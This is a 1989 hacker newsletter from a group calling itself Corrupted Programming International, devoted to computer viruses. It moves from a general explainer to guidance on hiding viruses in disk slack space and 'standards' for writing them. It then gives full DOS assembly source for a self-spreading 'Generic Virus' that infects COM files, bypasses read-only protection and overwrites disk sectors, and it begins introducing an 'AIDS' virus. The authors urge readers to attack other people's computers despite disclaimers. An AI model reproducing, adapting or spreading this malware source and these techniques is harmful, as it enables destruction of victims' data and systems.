1902 lines
88 KiB
Plaintext
1902 lines
88 KiB
Plaintext
[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
|
||
* *
|
||
* @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
|
||
* @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
|
||
* @@@@ @@@@ @@@@ @@@@ @@@ *
|
||
* @@@ @@@ @@@@ @@@ *
|
||
* @@@ @@@@@@@@@@@@@@@ @@@ *
|
||
* @@@ @@@@@@@@@@@@@@ @@@ *
|
||
* @@@ @@@ @@@ *
|
||
* @@@@ @@@@ @@@ @@@ *
|
||
* @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
|
||
* @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
|
||
* *
|
||
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
|
||
|
||
C O R R U P T E D
|
||
|
||
P R O G R A M M I N G
|
||
|
||
I N T E R N A T I O N A L
|
||
|
||
|
||
|
||
presents:
|
||
|
||
|
||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
@ @
|
||
@ Virili And Trojan Horses @
|
||
@ @
|
||
@ A Protagonist's Point Of View @
|
||
@ @
|
||
@ Issue #2 @
|
||
@ @
|
||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
DISCLAIMER::All of the information contained in this newsletter reflects the
|
||
thoughts and ideas of the authors, not their actions. The sole
|
||
purpose of this document is to educate and spread information.
|
||
Any illegal or illicit action is not endorsed by the authors or
|
||
CPI. The authors and CPI are not responsible for any information
|
||
which may present itself as old or mis-interpreted, and actions
|
||
by the reader. Remember, 'Just Say No!'
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||
|
||
|
||
|
||
|
||
|
||
Introduction To CPI#2
|
||
---------------------
|
||
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
|
||
of view. This issue should prove a bit interesting, I dunno, but at least
|
||
entertaining for the time it takes to read. Enjoy the information and don't
|
||
forget the disclaimer.
|
||
Oh yes, if you have some interesting articles or an application to send
|
||
us, just see the BBS list at the end of this document. Thanx. All applications
|
||
and information will be voted on through the CPI Inner Circle. Hope you enjoy
|
||
this issue as much as we enjoyed typing it... hehe...
|
||
Until our next issue, (which may be whenever), good-bye.
|
||
|
||
Doctor Dissector
|
||
|
||
|
||
Table of Contents
|
||
-----------------
|
||
Part Title Author
|
||
-----------------------------------------------------------------------------
|
||
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
|
||
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
|
||
2.3 V-IDEA-1.............................................. Ashton Darkside
|
||
2.4 V-IDEA-2.............................................. Ashton Darkside
|
||
2.5 The Generic Virus..................................... Doctor Dissector
|
||
2.6 Aids.................................................. Doctor Dissector
|
||
2.7 Batch File Virus...................................... PHUN 3.2
|
||
2.8 Basic Virus........................................... PHUN 3.2
|
||
2.9 The Alemeda Virus..................................... PHUN 4.3
|
||
2.10 Virili In The News.................................... Various Sources
|
||
2.11 Application For CPI................................... CPI Inner Circle
|
||
(CPI Node Phone #'s Are In 2.11)
|
||
[2.2]
|
||
Explanation of Viruses and Trojans Horses
|
||
-----------------------------------------
|
||
Written by Acid Phreak
|
||
|
||
Like it's biological counterpart, a computer virus is an agent of
|
||
infection, insinuating itself into a program or disk and forcing its host
|
||
to replicate the virus code. Hackers fascinated by the concept of "living"
|
||
code wrote the first viruses as projects or as pranks. In the past few
|
||
years, however, a different kind of virus has become common, one that lives
|
||
up to an earlier meaning of the word: in Latin, virus means poison.
|
||
These new viruses incorporate features of another type of insidious
|
||
program called a Trojan horse. Such a program masquerades as a useful
|
||
utility or product but wreaks havoc on your system when you run it. It may
|
||
erase a few files, format your disk, steal secrets--anything software can
|
||
do, a Trojan horse can do. A malicious virus can do all this then attempt
|
||
to replicate itself and infect other systems.
|
||
The growing media coverage of the virus conceptand of specific viruse
|
||
has promoted the development of a new type of software. Antivirus programs,
|
||
vaccines--they go by many names, but their purpose is to protect from virus
|
||
attack. At present there are more antivirus programs than known viruses
|
||
(not for long).
|
||
Some experts quibble about exactly what a virus is. The most widely
|
||
known viruses, the IBM Xmas virus and the recent Internet virus, are not
|
||
viruses according to some experts because they do not infect other programs.
|
||
Others argue that every Trojan horse is a virus--one that depends completely
|
||
on people to spread it.
|
||
|
||
How They Reproduce:
|
||
-------------------
|
||
Viruses can't travel without people. Your PC will not become infected
|
||
unless someone runs an infected program on it, whether accidentally or on
|
||
purpose. PC's are different from mainframe networks in this way--the
|
||
mainframe Internet virus spread by transmitting itself to other systems and
|
||
ordering them to execute it as a program. That kind of active transmission
|
||
is not possible on a PC.
|
||
Virus code reproduces by changing something in your system. Some viruses
|
||
strike COMMAND.COM or the hidden system files. Others, like the notorious
|
||
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
|
||
attach themselves to any .COM or .EXE file. In truth, any file on your
|
||
system that can be executed--whether it's a program, a device driver, an
|
||
overlay, or even a batch file--could be the target of a virus.
|
||
When an infected program runs, the virus code usually executes first and
|
||
then transfers control to the original program. The virus may immediately
|
||
infect other programs, or it may load itself into RAM and continue spreading.
|
||
If the virus can infect a file that will be used on another system, it has
|
||
succeeded.
|
||
|
||
What They Can Do:
|
||
-----------------
|
||
Viruses go through two phases: a replication phase and an action phase.
|
||
The action doesn't happen until a certain even occurs--perhaps reaching a
|
||
special date or running the virus a certain number of times. It wouldn't
|
||
make sense for a virus to damage your system the first time it ran; it needs
|
||
some time to grow and spread first.
|
||
The most vulnerable spot for a virus attack is your hard disk's file
|
||
allocation table (FAT). This table tells DOS where every file's data resides
|
||
on the disk. Without the FAT, the data's still there but DOS can't find it.
|
||
A virus could also preform a low-level format on some or all the tracks of
|
||
your hard disk, erase all files, or change the CMOS memory on AT-class
|
||
computers so that they don't recognize the hard disk.
|
||
Most of the dangers involve data only, but it's even possible to burn
|
||
out a monochrome monitor with the right code.
|
||
Some virus assaults are quite subtl. One known virus finds four
|
||
consecutive digits on the screen and switches two. Let's hope you're not
|
||
balancing the company's books when this one hits. Others slow down system
|
||
operations or introduce serious errors.
|
||
[2.3]
|
||
-------------------------------------------------------------------------------
|
||
______ ________ ___________
|
||
/ ____ \ | ____ \ |____ ____|
|
||
| / \_| | | \ | | |
|
||
| | | |_____| | | |
|
||
| | | ______/ | |
|
||
| | _ | | | |
|
||
| \____/ | /\ | | /\ ____| |____ /\
|
||
\______/ \/ |_| \/ |___________| \/
|
||
|
||
|
||
"We ain't the phucking Salvation Army."
|
||
|
||
-------------------------------------------------------------------------------
|
||
|
||
|
||
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
|
||
|
||
* * * present * * *
|
||
|
||
"Ok, I've written the virus, now where the hell do I put it?"
|
||
|
||
By Ashton Darkside (DUNE / SATAN / CPI)
|
||
|
||
|
||
*******************************************************************************
|
||
DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES
|
||
ONLY! The author does NOT condone the use of this information in any manner
|
||
that would be illegal or harmful. The fact that the author knows and spreads
|
||
this information in no way suggests that he uses it. The author also accepts
|
||
no responsibility for the malicious use of this information by anyone who
|
||
reads it! Remember, we may talk alot, but we "just say no" to doing it.
|
||
*******************************************************************************
|
||
|
||
Ok, wow! You've just invented the most incredibly nifty virus. It
|
||
slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data!
|
||
But the only problem is, if you go around infecting every damn file, some cute
|
||
software company is going to start putting in procedures that checksum their
|
||
warez each time they run, which will make life for your infecting virus a total
|
||
bitch. Or somebody's going to come up with an incredibly nifty vaccination util
|
||
that will wipe it out. Because, i mean, hey, when disk space starts vanishing
|
||
suddenly in 500K chunks people tend to notice. Especially people like me that
|
||
rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying
|
||
"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need
|
||
to go around wasting your precious time when the answer is right there in front
|
||
of you! Think about it, you could be putting that time into writing better and
|
||
more inovative viruses, or you could be worring about keeping the file size,
|
||
the date & time, and the attributes the same. With this system, you only need
|
||
to infect one file, preferably one that's NOT a system file, but something that
|
||
will get run alot, and will be able to load your nifty virus on a daily basis.
|
||
This system also doesn't take up any disk space, other than the loader. And the
|
||
loader could conceivably be under 16 bytes (damn near undetectable). First of
|
||
all, you need to know what programs to infect. Now, everybody knows about using
|
||
COMMAND.COM and that's unoriginal anyway, when there are other programs people
|
||
run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or
|
||
WordPerfect; you get the idea. Better still are dos commands like Format, Link
|
||
or even compression utilities. But you get the point. Besides, who's going to
|
||
miss 16 bytes, right? Now, the good part: where to put the damn thing. One note
|
||
to the programmer: This could get tricky if your virus is over 2k or isn't
|
||
written in Assembly, but the size problem is easy enough, it would be a simple
|
||
thing to break your virus into parts and have the parts load each other into
|
||
the system so that you do eventually get the whole thing. The only problem with
|
||
using languages besides assembly is that it's hard to break them up into 2k
|
||
segments. If you want to infect floppys, or smaller disks, you'd be best off to
|
||
break your file into 512 byte segments, since they're easier to hide. But, hey,
|
||
in assembly, you can generate pretty small programs that do alot, tho. Ok, by
|
||
now you've probably figured out that we're talking about the part of the disk
|
||
called 'the slack'. Every disk that your computer uses is divided up into parts
|
||
called sectors, which are (in almost all cases) 512 bytes. But in larger disks,
|
||
and even in floppies, keeping track of every single sector would be a complete
|
||
bitch. So the sectors are bunched together into groups called 'clusters'. On
|
||
floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard
|
||
disks, they're typically 4096 bytes, or eight sectors. Now think about it, you
|
||
have programs on your hard disk, and what are the odds that they will have
|
||
sizes that always end up in increments of 4096? If I've lost you, think of it
|
||
this way: the file takes up a bunch of clusters, but in the last cluster it
|
||
uses, there is usually some 'slack', or space that isn't used by the file. This
|
||
space is between where the actual file ends and where the actual cluster ends.
|
||
So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard
|
||
disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton
|
||
program 'FS /S /T' command from your root directory, and subtract the total
|
||
size of the files from the total disk space used. That's how much 'slack' space
|
||
is on your disk (a hell of alot, even on a floppy). To use the slack, all you
|
||
need to do is to find a chunk of slack big enough to fit your virus (or a
|
||
segment of your virus) and use direct disk access (INT 13) to put your virus
|
||
there. There is one minor problem with this. Any disk write to that cluster
|
||
will overwrite the slack with 'garbage' from memory. This is because of the way
|
||
DOS manages it's disk I/O and it can't be fixed without alot of hassles. But,
|
||
there is a way around even this. And it involves a popular (abeit outdated and
|
||
usually ineffectual) form of virus protection called the READ-ONLY flag. This
|
||
flag is the greatest friend of this type of virus. Because if the file is not
|
||
written to, the last cluster is not written to, and voila! Your virus is safe
|
||
from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk
|
||
I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set
|
||
|
||
because that has the same Read-only effect (even tho I haven't seen it written,
|
||
it's true that if the file is designated system, DOS treats it as read-only,
|
||
whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM
|
||
in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too
|
||
lazy to find out myself) or a protected (!) COMMAND.COM file in either type of
|
||
DOS would be ideal for this. All you have to do is then insert your loader into
|
||
some innocent-looking file, and you are in business. All your loader has to do
|
||
is read the sector into the highest part of memory, and do a far call to it.
|
||
Your virus cann then go about waiting for floppy disks to infect, and place
|
||
loaders on any available executable file on the disk. Sound pretty neet? It is!
|
||
Anyway, have fun, and be sure to upload your virus, along with a README file on
|
||
how it works to CPI Headquarters so we can check it out! And remember: don't
|
||
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
|
||
the Sysop is a leech and you want to shove his balls down his throat. Because
|
||
if all the PHP boards go down (especially members of CPI), who the hell can you
|
||
go to for all these nifty virus ideas? And besides, it's betraying your own
|
||
people, which is uncool even if you are an anarchist. So, target uncool PD
|
||
boards, or your boss's computer or whatever, but don't attack your friends.
|
||
Other than that, have phun, and phuck it up!
|
||
|
||
Ashton Darkside
|
||
Dallas Underground Network Exchange (DUNE)
|
||
Software And Telecom Applicaitons Network (SATAN)
|
||
Corrupted Programmers International (CPI)
|
||
|
||
|
||
PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).
|
||
|
||
Call these boards because the sysops are cool:
|
||
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
|
||
System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader)
|
||
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
|
||
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
|
||
The Jolly Bardsmen's Pub & Tavern
|
||
The Sierra Crib
|
||
The Phrozen Phorest
|
||
Knight Shadow's Grotto
|
||
|
||
And if I forgot your board, sorry, but don't send me E-mail bitching about it!
|
||
[2.4]
|
||
-------------------------------------------------------------------------------
|
||
______ ________ ___________
|
||
/ ____ \ | ____ \ |____ ____|
|
||
| / \_| | | \ | | |
|
||
| | | |_____| | | |
|
||
| | | ______/ | |
|
||
| | _ | | | |
|
||
| \____/ | /\ | | /\ ____| |____ /\
|
||
\______/ \/ |_| \/ |___________| \/
|
||
|
||
|
||
"We ain't the phucking Salvation Army."
|
||
|
||
-------------------------------------------------------------------------------
|
||
|
||
|
||
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
|
||
|
||
* * * present * * *
|
||
|
||
CPI Virus Standards - Protect yourself and your friends
|
||
|
||
By Ashton Darkside (DUNE / SATAN / CPI)
|
||
|
||
|
||
*******************************************************************************
|
||
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
|
||
ONLY! The author does NOT condone the use of this information in any manner
|
||
that would be illegal or harmful. The fact that the author knows and spreads
|
||
this information in no way suggests that he uses it. The author also accepts
|
||
no responsibility for the malicious use of this information by anyone who
|
||
reads it! Remember, we may talk alot, but we "just say no" to doing it.
|
||
*******************************************************************************
|
||
|
||
One of the main problems with viruses is that once you set one loose,
|
||
it is no longer under your control. I propose to stop this by introducing some
|
||
standards of virus writing that will enable them to be deactivated whenever
|
||
they enter a 'friendly' (CPI) system. In the long run, even the author of the
|
||
virus is not immune to being attacked. The following are what I have termed the
|
||
CPI standards for writing viruses. They will allow a virus to easily check any
|
||
system they are being run on for a type of 'identity badge'. If it is found,
|
||
the virus will not infect the system it is being run on. The other standards
|
||
are mostly written around this.
|
||
|
||
CPI Standards for writing viruses -
|
||
|
||
1 - The virus will have an 'active period' and an 'inactive period'.
|
||
The active periods will be no more than one year in length (to make
|
||
it more difficult to discover the virus). You may release different
|
||
versions of your virus with different 'active periods'. It is not
|
||
recommended that your virus deactivate itself after the set active
|
||
period, as this would enable people to deactivate viruses by using
|
||
their computer with the date set to 2069 or something. It is also
|
||
required that activation periods begin on January 1 and end on
|
||
December 31. This will coincide with the changing identity codes.
|
||
|
||
2 - The virus will check for an identity code by executing Interrrupt
|
||
12h with the following register settings: AX - 4350, BX - 4920,
|
||
CX - AB46, DX - 554E. If the system is friendly, then a pointer
|
||
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
|
||
will have different contents in different years. The codes are not
|
||
to be included in any text file, and should only be given through
|
||
E-mail on CPI affiliated systems. You can always ask me by sending
|
||
me mail at The Andromeda Strain BBS. If a system is detected as
|
||
friendly, the virus will not attempt to infect or damage it, but it
|
||
is ok to display a little greeting message about how lucky the
|
||
user was.
|
||
|
||
3 - We very much encourage you to upload your virus, along with a breif
|
||
description on the workings into the CPI section at The Andromeda
|
||
Strain BBS. Only CPI members will know about your virus. This is
|
||
so that CPI members can share techniques and it also allows us to
|
||
verify that the identity check works. If we see any improvements
|
||
that could be made, such as ways to streamline code, better ways of
|
||
spreading, etc. we will inform you so that you can make the changes
|
||
if you wish.
|
||
|
||
4 - It is also suggested that you use ADS standard for virus storage on
|
||
infected disks. This meathod uses disk slack space for storage and
|
||
is more thoroughly described in a previous text file by me. I think
|
||
that this is the most effective and invisible way to store viruli.
|
||
|
||
5 - A list of CPI-Standard viruli will be avaliable at all times from
|
||
The Andromeda Strain BBS, to CPI users. Identity strings will also
|
||
be available to anyone in CPI, or anyone who uploads source code to
|
||
a virus which is 100% complete except for the Identity string (it
|
||
must be written to CPI-Standards). Non-CPI members who do this will
|
||
be more seriously considered for membership in CPI.
|
||
|
||
Ashton Darkside
|
||
Dallas Underground Network Exchange (DUNE)
|
||
Software And Telecom Applications Network (SATAN)
|
||
Corrupted Programmers International (CPI)
|
||
|
||
PS: This file (by itself) has approx 2.5k of slack.
|
||
;[2.5]
|
||
;=============================================================================
|
||
;
|
||
; C*P*I
|
||
;
|
||
; CORRUPTED PROGRAMMING INTERNATIONAL
|
||
; -----------------------------------
|
||
; p r e s e n t s
|
||
;
|
||
; T H E
|
||
; _ _
|
||
; (g) GENERIC VIRUS (g)
|
||
; ^ ^
|
||
;
|
||
;
|
||
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
|
||
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
|
||
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO
|
||
; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
|
||
;
|
||
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
|
||
; THE DISK. HAVE PHUN WITH THIS ONE.
|
||
;
|
||
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
|
||
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
|
||
;
|
||
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
|
||
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
|
||
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
|
||
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
|
||
;
|
||
; DOCTOR DISSECTOR
|
||
; CPI INNER CIRCLE
|
||
;
|
||
;=============================================================================
|
||
|
||
MAIN:
|
||
NOP ;| Marker bytes that identify this program
|
||
NOP ;| as infected/a virus
|
||
NOP ;|
|
||
|
||
MOV AX,00 ;| Initialize the pointers
|
||
MOV ES:[POINTER],AX ;|
|
||
MOV ES:[COUNTER],AX ;|
|
||
MOV ES:[DISKS B],AL ;|
|
||
|
||
MOV AH,19 ;| Get the selected drive (dir?)
|
||
INT 21 ;|
|
||
|
||
MOV CS:DRIVE,AL ;| Get current path (save drive)
|
||
MOV AH,47 ;| (dir?)
|
||
MOV DH,0 ;|
|
||
ADD AL,1 ;|
|
||
MOV DL,AL ;| (in actual drive)
|
||
LEA SI,CS:OLD_PATH ;|
|
||
INT 21 ;|
|
||
|
||
MOV AH,0E ;| Find # of drives
|
||
MOV DL,0 ;|
|
||
INT 21 ;|
|
||
CMP AL,01 ;| (Check if only one drive)
|
||
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
|
||
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
|
||
|
||
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
|
||
LEA BX,SEARCH_ORDER ;|
|
||
ADD BX,AX ;|
|
||
ADD BX,0001 ;|
|
||
MOV CS:POINTER,BX ;|
|
||
CLC ;|
|
||
|
||
CHANGE_DISK: ;| Carry is set if no more .COM files are
|
||
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
|
||
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
|
||
LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program
|
||
INT 21 ;| to large to fit in memory" when starting
|
||
CMP AL,0FF ;| larger infected programs
|
||
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
|
||
|
||
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
|
||
INT 21 ;| then random sectors on the disk will be
|
||
MOV BX,CS:POINTER ;| overwritten depending on the system time
|
||
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
|
||
MOV BX,DX ;| complete "infection" of a storage medium.
|
||
MOV CX,2 ;| The virus can find nothing more to infect
|
||
MOV DH,0 ;| starts its destruction.
|
||
INT 26 ;| (write crap on disk)
|
||
|
||
NO_NAME_CHANGE: ;| Check if the end of the search order table
|
||
MOV BX,CS:POINTER ;| has been reached. If so, end.
|
||
DEC BX ;|
|
||
MOV CS:POINTER,BX ;|
|
||
MOV DL,CS:[BX] ;|
|
||
CMP DL,0FF ;|
|
||
JNZ HUPS2 ;|
|
||
JMP HOPS ;|
|
||
|
||
HUPS2: ;| Get a new drive from the search order table
|
||
MOV AH,0E ;| and select it, beginning with the ROOT dir.
|
||
INT 21 ;| (change drive)
|
||
MOV AH,3B ;| (change path)
|
||
LEA DX,PATH ;|
|
||
INT 21 ;|
|
||
JMP FIND_FIRST_FILE ;|
|
||
|
||
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
|
||
MOV AH,17 ;| first subdir. First, (change .exe to .com)
|
||
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
|
||
INT 21 ;| old directory.
|
||
MOV AH,3B ;| (use root directory)
|
||
LEA DX,PATH ;|
|
||
INT 21 ;|
|
||
MOV AH,04E ;| (search for first subdirectory)
|
||
MOV CX,00010001B ;| (dir mask)
|
||
LEA DX,MASKE_DIR ;|
|
||
INT 21 ;|
|
||
JC CHANGE_DISK ;|
|
||
MOV BX,CS:COUNTER ;|
|
||
INC BX ;|
|
||
DEC BX ;|
|
||
JZ USE_NEXT_SUBDIR ;|
|
||
|
||
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
|
||
MOV AH,4FH ;| are found, the (search for next subdir)
|
||
INT 21 ;| drive will be changed.
|
||
JC CHANGE_DISK ;|
|
||
DEC BX ;|
|
||
JNZ FIND_NEXT_SUBDIR ;|
|
||
|
||
USE_NEXT_SUBDIR:
|
||
MOV AH,2FH ;| Select found directory. (get dta address)
|
||
INT 21 ;|
|
||
ADD BX,1CH ;|
|
||
MOV ES:[BX],W"\" ;| (address of name in dta)
|
||
INC BX ;|
|
||
PUSH DS ;|
|
||
MOV AX,ES ;|
|
||
MOV DS,AX ;|
|
||
MOV DX,BX ;|
|
||
MOV AH,3B ;| (change path)
|
||
INT 21 ;|
|
||
POP DS ;|
|
||
MOV BX,CS:COUNTER ;|
|
||
INC BX ;|
|
||
MOV CS:COUNTER,BX ;|
|
||
|
||
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
|
||
MOV AH,04E ;| If there are none, (Search for first)
|
||
MOV CX,00000001B ;| search the next directory. (mask)
|
||
LEA DX,MASKE_COM ;|
|
||
INT 21 ;|
|
||
JC FIND_FIRST_SUBDIR ;|
|
||
JMP CHECK_IF_ILL ;|
|
||
|
||
FIND_NEXT_FILE: ;| If program is ill (infected) then search
|
||
MOV AH,4FH ;| for another. (search for next)
|
||
INT 21 ;|
|
||
JC FIND_FIRST_SUBDIR ;|
|
||
|
||
CHECK_IF_ILL: ;| Check if already infected by virus.
|
||
MOV AH,3D ;| (open channel)
|
||
MOV AL,02 ;| (read/write)
|
||
MOV DX,9EH ;| (address of name in dta)
|
||
INT 21 ;|
|
||
MOV BX,AX ;| (save channel)
|
||
MOV AH,3FH ;| (read file)
|
||
MOV CH,BUFLEN ;|
|
||
MOV DX,BUFFER ;| (write in buffer)
|
||
INT 21 ;|
|
||
MOV AH,3EH ;| (close file)
|
||
INT 21 ;|
|
||
MOV BX,CS:[BUFFER] ;| (look for three NOP's)
|
||
CMP BX,9090 ;|
|
||
JZ FIND_NEXT_FILE ;|
|
||
|
||
MOV AH,43 ;| This section by-passes (write enable)
|
||
MOV AL,0 ;| the MS/PC DOS Write Protection.
|
||
MOV DX,9EH ;| (address of name in dta)
|
||
INT 21 ;|
|
||
MOV AH,43 ;|
|
||
MOV AL,01 ;|
|
||
AND CX,11111110B ;|
|
||
INT 21 ;|
|
||
|
||
MOV AH,3D ;| Open file for read/write (open channel)
|
||
MOV AL,02 ;| access (read/write)
|
||
MOV DX,9EH ;| (address of name in dta)
|
||
INT 21 ;|
|
||
|
||
MOV BX,AX ;| Read date entry of program and (channel)
|
||
MOV AH,57 ;| save for future use. (get date)
|
||
MOV AL,0 ;|
|
||
INT 21 ;|
|
||
PUSH CX ;| (save date)
|
||
PUSH DX ;|
|
||
|
||
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
|
||
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
|
||
MOV DX,CS:[BUFFER+1] ;| (save new jump)
|
||
LEA CX,CONT-100 ;|
|
||
SUB DX,CX ;|
|
||
MOV CS:[CONTA],DX ;|
|
||
|
||
MOV AH,57 ;| The virus now copies itself to (write date)
|
||
MOV AL,1 ;| to the start of the file.
|
||
POP DX ;|
|
||
POP CX ;| (restore date)
|
||
INT 21 ;|
|
||
MOV AH,3EH ;| (close file)
|
||
INT 21 ;|
|
||
|
||
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
|
||
MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the
|
||
;| start of the program. This is done to
|
||
HOPS: ;| preserve the executability of the host
|
||
NOP ;| program as much as possible. After saving,
|
||
CALL USE_OLD ;| it still works with the jump address in the
|
||
;| virus. The jump address in the virus differs
|
||
;| from the jump address in memory
|
||
|
||
CONT DB 0E9 ;| Continue with the host program (make jump)
|
||
CONTA DW 0 ;|
|
||
MOV AH,00 ;|
|
||
INT 21 ;|
|
||
|
||
USE_OLD:
|
||
MOV AH,0E ;| Reactivate the selected (use old drive)
|
||
MOV DL,CS:DRIVE ;| drive at the start of the program, and
|
||
INT 21 ;| reactivate the selected path at the start
|
||
MOV AH,3B ;| of the program.(use old drive)
|
||
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
|
||
INT 21 ;|
|
||
RET ;|
|
||
|
||
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
|
||
|
||
POINTER DW 0000 ;| (pointer f. search order)
|
||
COUNTER DW 0000 ;| (counter f. nth. search)
|
||
DISKS DB 0 ;| (number of disks)
|
||
MASKE_COM DB "*.COM",00 ;| (search for com files)
|
||
MASKE_DIR DB "*",00 ;| (search for dir's)
|
||
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
|
||
DB 0,"????????EXE",0,0,0,0
|
||
DB 0,"????????COM",0
|
||
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
|
||
DB 0,"???????????",0,0,0,0
|
||
DB 0,"????????COM",0
|
||
|
||
BUFFER EQU 0E00 ;| (a safe place)
|
||
|
||
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
|
||
;| if you modify this source. Be careful
|
||
;| for this may change!
|
||
|
||
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
|
||
|
||
PATH DB "\",0 ;| (first place)
|
||
DRIVE DB 0 ;| (actual drive)
|
||
BACK_SLASH DB "\"
|
||
OLD_PATH DB 32 DUP (?) ;| (old path)
|
||
[2.6]
|
||
+-------------------------------+ +--------------------------------------+
|
||
| | P | |
|
||
| @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### |
|
||
| @@ @@ @@ @@ | R | # # # # # # |
|
||
| @@ @@ @@ @@ | * | ##### # # # ##### |
|
||
| @@ @@@@@@@@ @@ | E | # # # # # # |
|
||
| @@ @@ @@ | * | # # ##### #### ##### |
|
||
| @@ @@ @@ | S | |
|
||
| @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+
|
||
| | E | A NEW AND IMPROVED VIRUS FOR |
|
||
+-------------------------------+ * | PC/MS DOS MACHINES |
|
||
| C O R R U P T E D | N +--------------------------------------+
|
||
| | * | CREATED BY: DOCTOR DISSECTOR |
|
||
| P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
|
||
| | * | AUTHOR NOT RESPONSIBLE FOR READERS |
|
||
| I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
|
||
+-------------------------------+ +--------------------------------------+
|
||
|
||
Well well, here it is... I call it AIDS... It infects all COM files, but it is
|
||
not perfect, so it will also change the date/time stamp to the current system.
|
||
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!
|
||
|
||
Anyway, this virus was originally named NUMBER ONE, and I modified the code so
|
||
that it would fit my needs. The source code, which is included with this neato
|
||
package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works.
|
||
|
||
Well, I added a few things, you can experiment or mess around with it if you'd
|
||
like to, and add any mods to it that you want, but change the name and give us
|
||
some credit if you do.
|
||
|
||
The file is approximately 13k long, and this extra memory will be added to the
|
||
file it picks as host. If no more COM files are to be found, it picks a random
|
||
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
|
||
